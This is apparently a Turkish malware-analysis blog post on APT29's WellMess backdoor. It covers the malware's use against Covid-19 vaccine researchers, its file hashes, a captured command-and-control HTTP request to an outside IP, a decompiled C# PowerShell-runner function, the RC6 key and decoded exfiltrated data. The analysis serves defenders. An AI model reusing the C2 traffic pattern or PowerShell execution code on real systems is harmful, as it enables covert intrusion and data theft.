APT-29 WellMess’in Kullandığı Initial Access Taktiği
APT29, NSA ve çeşitli siber güvenlik firmalarının edindiği bilgilere göre Rusya devleti ve istihbaratı ile ilişkili olduğu düşünülen bir Hacker grubudur. “APT”, “Advanced Persisten Threat” yani “gelişmiş kalıcı tehdit” anlamına gelir. APT29 hacker grubuna siber güvenlik firmaları tarafından Cozy Bear, CozyDuke ve Dukes gibi çeşitli takma adlar verilmiştir.
APT-29 grubu, saldırılarını son derece planlı ve karmaşık bir şekilde gerçekleştirmiştir. Gerçekleştirilen saldırılardan bir tanesinde WellMess zararlı yazılımı kullanılmıştır.
WellMess Zararlı Yazılımı
Covid-19 aşısını araştıran firmalardan ve Ar-Ge faaliyeti gösteren üniversitelerden aşıya dair araştırma bilgilerini çalmak için Citrix, Pulse Secure, FortiGate, ve Zimbra gibi yazılımlarının güvenlik açıklarını kullanarak bu sistemler üzerinden veri hırsızlığı yapılmıştır. Güvenlik açığı olan sistemlere yüklenen WellMess zararlısı saldırganların hedef sistem üzerinden komut satırı çalıştırmasına, dosya yükleme veya indirmesine olanak sağlayan, Post Exploitation (istismar sonrası) olarak kullanılan ve şifreli iletişim sağlayan bir Command and Control aracıdır.
Linux sistemler için ELF formatı ve Windows işletim sistemlerinde çalışması için 32-bit PE formatı vardır.
SHA-256 Hash değerleri
- 0b8e6a11adaa3df120ec15846bb966d674724b6b92eae34d63b665e0698e0193 (Golang&ELF)
- bec1981e422c1e01c14511d384a33c9bcc66456c1274bbbac073da825a3f537d (Golang&PE)
- 2285a264ffab59ab5a1eb4e2b9bcab9baf26750b6c551ee3094af56a4442ac41 (.Net&PE)
Zararlı yazılım hedef cihazda çalıştırıldığında saldırganlar tarafından kontrol edilen Command and Control sunucusu ile şifreli olarak iletişime geçmektedir. Bu aşamadan sonra saldırganlar hedef sistem üzerinde kod yürütmek için Reverse Shell alıp Domain Group, sistem ve ağ bilgilerini toplayıp başka bir sisteme sızmak için sonraki aşamaya geçiş yapmaktadır.
WellMess Web Trafiği
POST / HTTP/1.1
Host: 141.98.212.55:53
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0
Content-Length: 422
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cookie: kODDoMox=1BL6+BSiiy+oacN+71k8zt0+QD9kU+68ED+dmsgi+yPol5+b%2C; OVbjPRp4=0w1X.+2IB+nuI+58oEfe4+q9P+nrw+pmQk3X+fN%2CB9u+aP%2C3EB.+%3Aa%3A+0UOlTc+Ew%2Cy5O+Y%2CXTx%2C+Of7mNHE+PMvR+ReAze6+P15ihyA.+zysw+USxJ8+nxu3p6D+tkFDV8w++++++
Accept-Encoding: gzip
DZ0 rUtgNTf e,j:gB DFd dLSYB mq53txH 8JYY75r EQXyIUk 2FqYSrc. xscOr3E rzbl Q494 Gvkb1q sifD6 pog q0Ybz4D asij. 26sQ PkMZPh1 IyV 8VW 0C3038b QpTy8Cf z6mJw oeg. 6MG8,lQ ymdPXR q1tRd Fxg brhM 7cp Zf9JPKV CcKyKPK. OFdOqE 6XO oL8kKA qnq 9c2Yc9 ,xm6Gdy ra9 ORzvq. 3BX8q 6rE 2:H 1ALG8G N7yX 8hn3aNR kHykST9 KucSC2. b0l LJBc6i 9hK2 ZtJ1 jLi9cUA 7VRh G6PGAU qM9n5FD. bTy YMzPKF KKnk0i TyYK SMAV sbE 2Jflrk yPmCpN. 2X35q5 JhXg
Saldırganlar Web trafiği üzerinden Cookie ile hedef cihaza komut göndermektedir. Gönderilen komut RC6 ile şifrelenmiş ve Base64 ile encode (şifrelenmiş) edilmiş durumdadır.(Şekil 1-2-3)
(Şekil – 1)
(Şekil-2)
(Şekil-3)
Windows işletim sistemleri için geliştirilen WellMess varyantı ( .NET versiyonu) hedef cihazda özellikle Active Directory (Aktif Dizin) gibi sistemleri sömürmek için Powershell kullanmaktadır.
private static string Pshell(string script)
{
string empty = string.Empty;
Collection<PSObject> collection;
using (Runspace runspace = RunspaceFactory.CreateRunspace())
{
try
{
runspace.Open();
using (PowerShell powerShell = PowerShell.Create())
{
powerShell.Runspace = runspace;
ScriptBlock scriptBlock = ScriptBlock.Create(script);
powerShell.AddCommand(“Invoke-Command”).AddParameter(“ScriptBlock”, (object) scriptBlock);
collection = powerShell.Invoke();
}
}
finally
{
runspace.Close();
}
}
foreach (PSObject psObject in collection)
empty += psObject.ToString();
return empty;
}
Saldırganların Hedef Cihaz ile Kurdukları Şifreli Bağlantı
Gelen ve giden veriyi şifrelemek için kullanılan RC6 anahtarı:
- OHVbn3Fdv/sgvP9VRO/9OQ==
Saldırganlar tarafından hedef sisteme şifreli olarak gönderilen komut:
- HNX7A5nA=UUn5+2g6J+emwEU+MSkFqW+FAtoNc+dtFnr.+dHFn3ip+P8I+r19+B7s+UM571cp+j6hf+BvdjukE+YxeSiW.+SNXbt+VIB4fxC+CLa9el+eVHm+RspIMTQ+Z57y5+ZyY5tA6
Şifreli olarak hedef sistemden gelen web trafiği:
- <;head;>3230302e3230302e3230302e3232317c7c757365727c75736572e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855<;head;><;title;>rc<;title;><;service;><;service;>
Son aşamada saldırganlara gelen şifresiz ve encode edilmiş veri
200.200.200.221||user|user e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
Özetle,
APT-29 grubu Siber Espiyonaj yaparak hedef sistemlerde olabilecek en gizli ve sessiz şekilde hareket eder (bağlantı için genelde 443 , 80 , 53 portlarını kullanırlar). Çalınacak verinin önemi yüksek ise hedef sistemde çok daha yavaş hareket eder. Operasyonlarını bitirip istedikleri verileri aldıktan sonra sistem içinde iz bırakmamaya çok dikkat ederler.
Bu tür saldırılardan çıkarılacak en önemli ders firmaların düzenli olarak kullandıkları yazılımları sürekli olarak güncel tutmalıdır, güncelleme ile bu yazılımlardan kaynaklanan kritik güvenlik zafiyetlerinin tehdit aktörleri tarafından istismar edilmesi önemli ölçüde önlenebilir.